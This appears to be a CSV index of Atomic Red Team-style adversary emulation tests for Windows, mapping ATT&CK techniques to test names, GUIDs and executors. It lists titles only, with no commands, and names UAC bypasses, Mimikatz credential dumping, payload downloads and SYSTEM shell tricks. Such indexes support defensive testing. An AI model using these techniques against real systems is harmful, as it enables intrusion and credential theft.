defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
